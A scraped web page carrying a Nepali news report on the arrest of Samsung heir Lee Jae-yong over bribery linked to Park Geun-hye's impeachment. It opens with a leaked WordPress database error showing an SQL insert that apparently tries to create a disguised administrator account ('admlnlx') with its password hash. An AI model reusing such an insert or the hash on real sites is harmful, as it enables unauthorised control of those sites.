WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B/SiYm/7UdY4T56NiIONq/3vIlUCvi.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-16 01:56:32', '', 'admlnlx', 'admlnlx')
एजेन्सी,फागुन ६ –
दक्षिण कोरियाली कम्पनी सामसुङका उत्तराधिकारी ली जाई योङलाई प्रहरीले पक्राउ गरेको छ। निलम्बित राष्ट्रपति पार्क गुएन हाएमाथिको महाअभियोगसंग सम्बन्धित घुसकान्डसहित आर्थिक अनियमितताका विभिन्न घटनामा संलग्न रहेको आरोपमा प्रहरीले उनलाई पक्राउ गरेको हो। सामसुङमाथि सरकारी लाभ लिनका लागि राष्ट्रपति पार्कका साथी चोई सुन सिलको गैर नाफामूलक भनिएको संस्थालाई चन्दा दिएको आरोप लागेको छ। सामसुङ र यसका कार्यवाहक प्रमुख लीले यो आरोपको खण्डन गर्दै आएका छन्। गत महिना सोधपुछ गरे पनि लि लाई पक्राउ गर्नु नपर्ने निर्णय गरिएको थियो। तर, गएको हप्ता फेरि सोधपुछ गरिएपछि अदालतले नयाँ आपराधिक अभियोग र प्रमाणलाई ध्यानमा राखी पक्राउ गर्नु आवश्यक रहेको बताएपछि पक्राउ गरिएको अन्तर्राष्ट्रिय सञ्चारमाध्यमहरुले जनाएका छन्। ली माथि घुस दिएको, झुटो बयान दिएको, आपराधिक नाफा आर्जन गरेको, विदेशमा सम्पत्ति लुकाएको जस्ता आरोप छ।